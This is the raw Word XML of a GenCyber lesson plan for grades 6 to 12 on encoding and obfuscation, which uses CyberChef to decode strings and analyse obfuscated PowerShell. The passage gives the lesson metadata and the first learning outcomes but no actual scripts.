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D7A7" w14:textId="77777777" w:rsidR="007265A1" w:rsidRDefault="002B597D">
      <w:pPr>
        <w:spacing w:after="491" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="6780" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24BC76C2" wp14:editId="6D24AD17">
            <wp:extent cx="1504950" cy="100012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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1504950" cy="1000125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1045C8EF" w14:textId="2AEF24F4" w:rsidR="007265A1" w:rsidRDefault="00DD443A">
      <w:pPr>
        <w:spacing w:after="4" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Encoding and Obfuscation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603A3331" w14:textId="6264846B" w:rsidR="007265A1" w:rsidRDefault="002B597D">
      <w:pPr>
        <w:spacing w:after="279" w:line="306" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Lesson Description</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00DD443A" w:rsidRPr="00DD443A">
        <w:t>In this lesson, students will explore the concept of encoding in the context of cybersecurity and learn how to utilize the powerful online tool, CyberChef.io, for various encoding-related tasks</w:t>
      </w:r>
      <w:r w:rsidR="0029591B">
        <w:t xml:space="preserve"> and malicious code analysis</w:t>
      </w:r>
      <w:r w:rsidR="00DD443A" w:rsidRPr="00DD443A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CACBBF" w14:textId="539187CE" w:rsidR="007265A1" w:rsidRDefault="002B597D">
      <w:pPr>
        <w:spacing w:after="235" w:line="337" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Prerequisite Knowledge: </w:t>
      </w:r>
      <w:r w:rsidR="00A5065B">
        <w:t xml:space="preserve">Students should be able to follow an algorithm </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A5065B">
        <w:t>in order to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A5065B">
        <w:t xml:space="preserve"> encode and decode messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F73C47" w14:textId="3C9E9F0B" w:rsidR="007265A1" w:rsidRDefault="002B597D">
      <w:pPr>
        <w:spacing w:after="230" w:line="338" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Length of Completion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r w:rsidR="00DD443A">
        <w:t xml:space="preserve">session (nano module) but can be extended with additional examples or obfuscation techniques. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D013C1" w14:textId="39CE5246" w:rsidR="007265A1" w:rsidRDefault="002B597D">
      <w:pPr>
        <w:spacing w:after="323"/>
        <w:ind w:left="-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114989" wp14:editId="0A41EE8E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1111250</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>9116450</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5810275" cy="553653"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="2071" name="Group 2071" descr="This document is licensed with a Creative Commons Attribution 4.0 International License (C) 2017"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5810275" cy="553653"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5810275" cy="553653"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="55" name="Shape 55"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="19050" y="0"/>
                            <a:ext cx="5753100" cy="0"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5753100">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="57531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s:wsp>
                        <wps:cNvPr id="56" name="Rectangle 56"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5512290" y="56132"/>
                            <a:ext cx="309708" cy="120431"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7002550A" w14:textId="77777777" w:rsidR="007265A1" w:rsidRDefault="002B597D">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                                  <w:sz w:val="14"/>
                                </w:rPr>
                                <w:t>Page |</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="57" name="Rectangle 57"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5765217" y="56132"/>
                            <a:ext cx="59927" cy="120431"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="2796B4E5" w14:textId="77777777" w:rsidR="007265A1" w:rsidRDefault="002B597D">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                                  <w:sz w:val="14"/>
                                </w:rPr>
                                <w:t>1</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="58" name="Rectangle 58"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="783124" y="463104"/>
                            <a:ext cx="1552238" cy="120431"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="1B380C37" w14:textId="77777777" w:rsidR="007265A1" w:rsidRDefault="002B597D">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                                  <w:sz w:val="14"/>
                                </w:rPr>
                                <w:t>This document is licensed with a</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2051" name="Rectangle 2051"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1970283" y="463104"/>
                            <a:ext cx="859946" cy="120431"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4570C43B" w14:textId="77777777" w:rsidR="007265A1" w:rsidRDefault="00000000">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:hyperlink r:id="rId12">
                                <w:r w:rsidR="002B597D">
                                  <w:rPr>
                                    <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                                    <w:color w:val="0070C0"/>
                                    <w:sz w:val="14"/>
                                    <w:u w:val="single" w:color="0070C0"/>
                                  </w:rPr>
                                  <w:t>Creative Common</w:t>
                                </w:r>
                              </w:hyperlink>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2048" name="Rectangle 2048"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2616833" y="463104"/>
                            <a:ext cx="46244" cy="120431"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="2C73E07E" w14:textId="77777777" w:rsidR="007265A1" w:rsidRDefault="00000000">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:hyperlink r:id="rId13">
                                <w:r w:rsidR="002B597D">
                                  <w:rPr>
                                    <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                                    <w:color w:val="0070C0"/>
                                    <w:sz w:val="14"/>
                                    <w:u w:val="single" w:color="0070C0"/>
                                  </w:rPr>
                                  <w:t>s</w:t>
                                </w:r>
                              </w:hyperlink>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2052" name="Rectangle 2052"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2671671" y="463104"/>
                            <a:ext cx="1671613" cy="120431"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="3AD1755C" w14:textId="77777777" w:rsidR="007265A1" w:rsidRDefault="00000000">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:hyperlink r:id="rId14">
                                <w:r w:rsidR="002B597D">
                                  <w:rPr>
                                    <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                                    <w:color w:val="0070C0"/>
                                    <w:sz w:val="14"/>
                                    <w:u w:val="single" w:color="0070C0"/>
                                  </w:rPr>
                                  <w:t>Attribution 4.0 International Licens</w:t>
                                </w:r>
                              </w:hyperlink>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2049" name="Rectangle 2049"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3928504" y="463104"/>
                            <a:ext cx="58830" cy="120431"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="0447B5F7" w14:textId="77777777" w:rsidR="007265A1" w:rsidRDefault="00000000">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:hyperlink r:id="rId15">
                                <w:r w:rsidR="002B597D">
                                  <w:rPr>
                                    <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                                    <w:color w:val="0070C0"/>
                                    <w:sz w:val="14"/>
                                    <w:u w:val="single" w:color="0070C0"/>
                                  </w:rPr>
                                  <w:t>e</w:t>
                                </w:r>
                              </w:hyperlink>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2050" name="Rectangle 2050"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3992797" y="463104"/>
                            <a:ext cx="338217" cy="120431"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="34D4DF95" w14:textId="77777777" w:rsidR="007265A1" w:rsidRDefault="002B597D">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                                  <w:sz w:val="14"/>
                                </w:rPr>
                                <w:t>©2017</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16"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="272604"/>
                            <a:ext cx="723900" cy="257175"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="33114989" id="Group 2071" o:spid="_x0000_s1026" alt="This document is licensed with a Creative Commons Attribution 4.0 International License (C) 2017" style="position:absolute;left:0;text-align:left;margin-left:87.5pt;margin-top:717.85pt;width:457.5pt;height:43.6pt;z-index:251658240;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="58102,5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">
                <v:shape id="Shape 55" o:spid="_x0000_s1027" style="position:absolute;left:190;width:57531;height:0;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5753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" path="m,l5753100,e" filled="f" strokecolor="#888">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,5753100,0"/>
                </v:shape>
                <v:rect id="Rectangle 56" o:spid="_x0000_s1028" style="position:absolute;left:55122;top:561;width:3097;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002550A" w14:textId="77777777" w:rsidR="007265A1" w:rsidRDefault="002B597D">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                            <w:sz w:val="14"/>
                          </w:rPr>
                          <w:t>Page |</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 57" o:spid="_x0000_s1029" style="position:absolute;left:57652;top:561;width:599;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796B4E5" w14:textId="77777777" w:rsidR="007265A1" w:rsidRDefault="002B597D">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                            <w:sz w:val="14"/>
                          </w:rPr>
                          <w:t>1</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 58" o:spid="_x0000_s1030" style="position:absolute;left:7831;top:4631;width:15522;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380C37" w14:textId="77777777" w:rsidR="007265A1" w:rsidRDefault="002B597D">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                            <w:sz w:val="14"/>
                          </w:rPr>
                          <w:t>This document is licensed with a</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2051" o:spid="_x0000_s1031" style="position:absolute;left:19702;top:4631;width:8600;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4570C43B" w14:textId="77777777" w:rsidR="007265A1" w:rsidRDefault="00000000">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:hyperlink r:id="rId17">
                          <w:r w:rsidR="002B597D">
                            <w:rPr>
                              <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                              <w:color w:val="0070C0"/>
                              <w:sz w:val="14"/>
                              <w:u w:val="single" w:color="0070C0"/>
                            </w:rPr>
                            <w:t>Creative Common</w:t>
                          </w:r>
                        </w:hyperlink>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2048" o:spid="_x0000_s1032" style="position:absolute;left:26168;top:4631;width:462;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2C73E07E" w14:textId="77777777" w:rsidR="007265A1" w:rsidRDefault="00000000">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:hyperlink r:id="rId18">
                          <w:r w:rsidR="002B597D">
                            <w:rPr>
                              <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                              <w:color w:val="0070C0"/>
                              <w:sz w:val="14"/>
                              <w:u w:val="single" w:color="0070C0"/>
                            </w:rPr>
                            <w:t>s</w:t>
                          </w:r>
                        </w:hyperlink>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2052" o:spid="_x0000_s1033" style="position:absolute;left:26716;top:4631;width:16716;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3AD1755C" w14:textId="77777777" w:rsidR="007265A1" w:rsidRDefault="00000000">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:hyperlink r:id="rId19">
                          <w:r w:rsidR="002B597D">
                            <w:rPr>
                              <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                              <w:color w:val="0070C0"/>
                              <w:sz w:val="14"/>
                              <w:u w:val="single" w:color="0070C0"/>
                            </w:rPr>
                            <w:t>Attribution 4.0 International Licens</w:t>
                          </w:r>
                        </w:hyperlink>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2049" o:spid="_x0000_s1034" style="position:absolute;left:39285;top:4631;width:588;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0447B5F7" w14:textId="77777777" w:rsidR="007265A1" w:rsidRDefault="00000000">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:hyperlink r:id="rId20">
                          <w:r w:rsidR="002B597D">
                            <w:rPr>
                              <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                              <w:color w:val="0070C0"/>
                              <w:sz w:val="14"/>
                              <w:u w:val="single" w:color="0070C0"/>
                            </w:rPr>
                            <w:t>e</w:t>
                          </w:r>
                        </w:hyperlink>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2050" o:spid="_x0000_s1035" style="position:absolute;left:39927;top:4631;width:3383;height:1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34D4DF95" w14:textId="77777777" w:rsidR="007265A1" w:rsidRDefault="002B597D">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                            <w:sz w:val="14"/>
                          </w:rPr>
                          <w:t>©2017</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36" type="#_x0000_t75" style="position:absolute;top:2726;width:7239;height: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">
                  <v:imagedata r:id="rId21" o:title=""/>
                </v:shape>
                <w10:wrap type="topAndBottom" anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Level of Instruction: </w:t>
      </w:r>
      <w:r>
        <w:t>6-12th grade</w:t>
      </w:r>
      <w:r w:rsidR="00DD443A">
        <w:t xml:space="preserve"> intermediate/advanced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6192DA82" w14:textId="77777777" w:rsidR="007265A1" w:rsidRDefault="002B597D">
      <w:pPr>
        <w:spacing w:after="226" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Applicable First Principles &amp;/or Concepts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D58FC2" w14:textId="77777777" w:rsidR="007265A1" w:rsidRDefault="002B597D">
      <w:pPr>
        <w:spacing w:after="232" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>GenCyber Cybersecurity Concepts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F8D9D8" w14:textId="77777777" w:rsidR="007265A1" w:rsidRDefault="002B597D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="5774"/>
        </w:tabs>
        <w:spacing w:after="1211"/>
        <w:ind w:left="-15" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Confidentiality</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Think Like an Adversary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8A9916" w14:textId="78E0D19C" w:rsidR="00F27D81" w:rsidRDefault="002B597D" w:rsidP="00DD443A">
      <w:pPr>
        <w:spacing w:after="46" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Resources that are Needed: </w:t>
      </w:r>
      <w:r w:rsidR="00DD443A">
        <w:t>CyberChef.io access, obfuscated Powershell scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326536C8" w14:textId="375CCF54" w:rsidR="007265A1" w:rsidRDefault="002B597D">
      <w:pPr>
        <w:spacing w:after="273" w:line="335" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Accommodations Needed: </w:t>
      </w:r>
      <w:r>
        <w:t>Students with learning disabilities may need shortened messages of a few words.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF36B06" w14:textId="77777777" w:rsidR="007265A1" w:rsidRDefault="002B597D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>LEARNING OUTCOMES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685DB33F" w14:textId="3840678B" w:rsidR="007265A1" w:rsidRDefault="002B597D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:right="0" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Students will be able to apply </w:t>
      </w:r>
      <w:r w:rsidR="00FB544B">
        <w:t>decoding techniques to breakdown encoded strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB271A5" w14:textId="139ADDAE" w:rsidR="007265A1" w:rsidRDefault="002B597D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:right="0" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Students will be able to discuss the importance of </w:t>
      </w:r>
      <w:r w:rsidR="00FB544B">
        <w:t>obfuscation and being able to deobfuscate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BEA726" w14:textId="19E21A25" w:rsidR="007265A1" w:rsidRDefault="002B597D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="960"/>
        <w:ind w:right="0" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Students will be able to apply </w:t>
      </w:r>
      <w:r w:rsidR="00695990">
